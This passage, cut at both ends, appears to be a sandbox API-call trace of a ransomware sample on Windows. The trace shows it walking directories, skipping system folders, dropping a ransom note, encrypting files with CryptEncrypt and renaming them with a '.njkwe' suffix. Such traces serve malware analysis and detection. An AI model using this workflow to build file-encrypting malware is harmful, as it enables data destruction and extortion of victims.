lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0067.543] CloseHandle (hObject=0x434) returned 1 [0067.543] GetProcessHeap () returned 0xbe0000 [0067.543] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0067.543] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe68ff039, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a5650a, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xe6a5650a, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="x-none.16", cAlternateFileName="")) returned 0 [0067.543] FindClose (in: hFindFile=0xc1a3e0 | out: hFindFile=0xc1a3e0) returned 1 [0067.543] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 108 [0067.543] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0067.543] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0067.544] CloseHandle (hObject=0x430) returned 1 [0067.544] GetProcessHeap () returned 0xbe0000 [0067.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0067.544] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d43d48, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ee74e6, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x96ee74e6, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="19B11135-37BD-4FA1-A78E-C20CA2BDA1C0", cAlternateFileName="19B111~1")) returned 1 [0067.544] lstrcmpiW (lpString1="19B11135-37BD-4FA1-A78E-C20CA2BDA1C0", lpString2="Windows") returned -1 [0067.544] lstrcmpiW (lpString1="19B11135-37BD-4FA1-A78E-C20CA2BDA1C0", lpString2="$Recycle.bin") returned 1 [0067.544] lstrcmpiW (lpString1="19B11135-37BD-4FA1-A78E-C20CA2BDA1C0", lpString2="System Volume Information") returned -1 [0067.544] lstrcmpiW (lpString1="19B11135-37BD-4FA1-A78E-C20CA2BDA1C0", lpString2="Program Files") returned -1 [0067.544] lstrcmpiW (lpString1="19B11135-37BD-4FA1-A78E-C20CA2BDA1C0", lpString2="Program Files (x86)") returned -1 [0067.544] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0") returned 76 [0067.544] lstrcmpW (lpString1="19B11135-37BD-4FA1-A78E-C20CA2BDA1C0", lpString2=".") returned 1 [0067.545] lstrcmpW (lpString1="19B11135-37BD-4FA1-A78E-C20CA2BDA1C0", lpString2="..") returned 1 [0067.545] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.545] GetProcessHeap () returned 0xbe0000 [0067.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0067.545] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\*") returned 78 [0067.545] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d43d48, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ee74e6, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x96ee74e6, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fe0 [0067.545] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.545] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.545] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.545] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.545] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.545] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\.") returned 78 [0067.545] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.545] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d43d48, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ee74e6, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x96ee74e6, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.545] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.545] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.545] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.545] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.545] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.545] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\..") returned 79 [0067.545] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.545] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.545] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec13b1, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ee74e6, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x96ee74e6, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0067.545] lstrcmpiW (lpString1="en-us.16", lpString2="Windows") returned -1 [0067.545] lstrcmpiW (lpString1="en-us.16", lpString2="$Recycle.bin") returned 1 [0067.545] lstrcmpiW (lpString1="en-us.16", lpString2="System Volume Information") returned -1 [0067.545] lstrcmpiW (lpString1="en-us.16", lpString2="Program Files") returned -1 [0067.545] lstrcmpiW (lpString1="en-us.16", lpString2="Program Files (x86)") returned -1 [0067.545] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16") returned 85 [0067.546] lstrcmpW (lpString1="en-us.16", lpString2=".") returned 1 [0067.546] lstrcmpW (lpString1="en-us.16", lpString2="..") returned 1 [0067.546] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.546] GetProcessHeap () returned 0xbe0000 [0067.546] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0067.546] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\*") returned 87 [0067.546] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec13b1, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ee74e6, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x96ee74e6, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0067.547] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.548] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.548] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.548] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.548] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.548] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\.") returned 87 [0067.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.548] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96ec13b1, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ee74e6, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x96ee74e6, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.548] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.548] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.548] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.548] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.548] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.548] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\..") returned 88 [0067.548] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.548] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.548] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96ec13b1, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ec13b1, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x39768000, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x564f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDescriptor.en-us.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0067.548] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Windows") returned -1 [0067.548] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="$Recycle.bin") returned 1 [0067.548] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="System Volume Information") returned -1 [0067.548] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Program Files") returned -1 [0067.548] lstrcmpiW (lpString1="MasterDescriptor.en-us.xml", lpString2="Program Files (x86)") returned -1 [0067.548] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\MasterDescriptor.en-us.xml") returned 112 [0067.548] StrStrIW (lpFirst="MasterDescriptor.en-us.xml", lpSrch=".njkwe") returned 0x0 [0067.548] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.548] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="taridd") returned -1 [0067.548] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\MasterDescriptor.en-u", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.548] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.549] GetTickCount () returned 0x115146f [0067.549] GetTickCount () returned 0x115146f [0067.549] GetTickCount () returned 0x115146f [0067.549] GetTickCount () returned 0x115146f [0067.549] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.549] GetProcessHeap () returned 0xbe0000 [0067.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.550] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.668] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.668] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.668] GetProcessHeap () returned 0xbe0000 [0067.668] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.668] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.669] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.876] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.876] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.876] CloseHandle (hObject=0x438) returned 1 [0067.876] GetProcessHeap () returned 0xbe0000 [0067.876] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.876] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\MasterDescriptor.en-us.xml_r00t_{3sXlE5}.njkwe") returned 132 [0067.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\MasterDescriptor.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\en-us.16\\masterdescriptor.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0067.877] GetProcessHeap () returned 0xbe0000 [0067.877] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.877] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96ec13b1, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ec13b1, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x6035b600, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="s641033.hash", cAlternateFileName="S64103~1.HAS")) returned 1 [0067.877] lstrcmpiW (lpString1="s641033.hash", lpString2="Windows") returned -1 [0067.877] lstrcmpiW (lpString1="s641033.hash", lpString2="$Recycle.bin") returned 1 [0067.877] lstrcmpiW (lpString1="s641033.hash", lpString2="System Volume Information") returned -1 [0067.877] lstrcmpiW (lpString1="s641033.hash", lpString2="Program Files") returned 1 [0067.877] lstrcmpiW (lpString1="s641033.hash", lpString2="Program Files (x86)") returned 1 [0067.877] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\s641033.hash") returned 98 [0067.877] StrStrIW (lpFirst="s641033.hash", lpSrch=".njkwe") returned 0x0 [0067.877] lstrcmpW (lpString1="s641033.hash", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.877] lstrcmpW (lpString1="s641033.hash", lpString2="taridd") returned -1 [0067.877] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\s641033.hash", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.877] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.878] GetTickCount () returned 0x11515c6 [0067.878] GetTickCount () returned 0x11515c6 [0067.878] GetTickCount () returned 0x11515c6 [0067.878] GetTickCount () returned 0x11515c6 [0067.878] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.878] GetProcessHeap () returned 0xbe0000 [0067.878] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.878] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0067.879] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffff9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.879] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0067.879] GetProcessHeap () returned 0xbe0000 [0067.879] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.879] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.880] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.880] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.880] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.880] CloseHandle (hObject=0x438) returned 1 [0067.880] GetProcessHeap () returned 0xbe0000 [0067.880] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.880] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\s641033.hash_r00t_{3sXlE5}.njkwe") returned 118 [0067.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\en-us.16\\s641033.hash"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\s641033.hash_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\en-us.16\\s641033.hash_r00t_{3sxle5}.njkwe")) returned 1 [0067.881] GetProcessHeap () returned 0xbe0000 [0067.881] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.881] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96ec13b1, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0x96ec13b1, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x3e87ff00, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd77c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0067.881] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="Windows") returned -1 [0067.881] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="$Recycle.bin") returned 1 [0067.881] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="System Volume Information") returned -1 [0067.881] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="Program Files") returned 1 [0067.881] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="Program Files (x86)") returned 1 [0067.881] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\stream.x64.en-us.man.dat") returned 110 [0067.881] StrStrIW (lpFirst="stream.x64.en-us.man.dat", lpSrch=".njkwe") returned 0x0 [0067.881] lstrcmpW (lpString1="stream.x64.en-us.man.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.881] lstrcmpW (lpString1="stream.x64.en-us.man.dat", lpString2="taridd") returned -1 [0067.881] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\stream.x64.en-us.man.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.881] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\19B11135-37BD-4FA1-A78E-C20CA2BDA1C0\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\19b11135-37bd-4fa1-a78e-c20ca2bda1c0\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.882] GetTickCount () returned 0x11515c6 [0067.882] GetTickCount () returned 0x11515c6 [0067.882] GetTickCount () returned 0x11515c6 [0067.882] GetTickCount () returned 0x11515c6 [0067.882] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.882] GetProcessHeap () returned 0xbe0000 [0067.882] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.882] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, 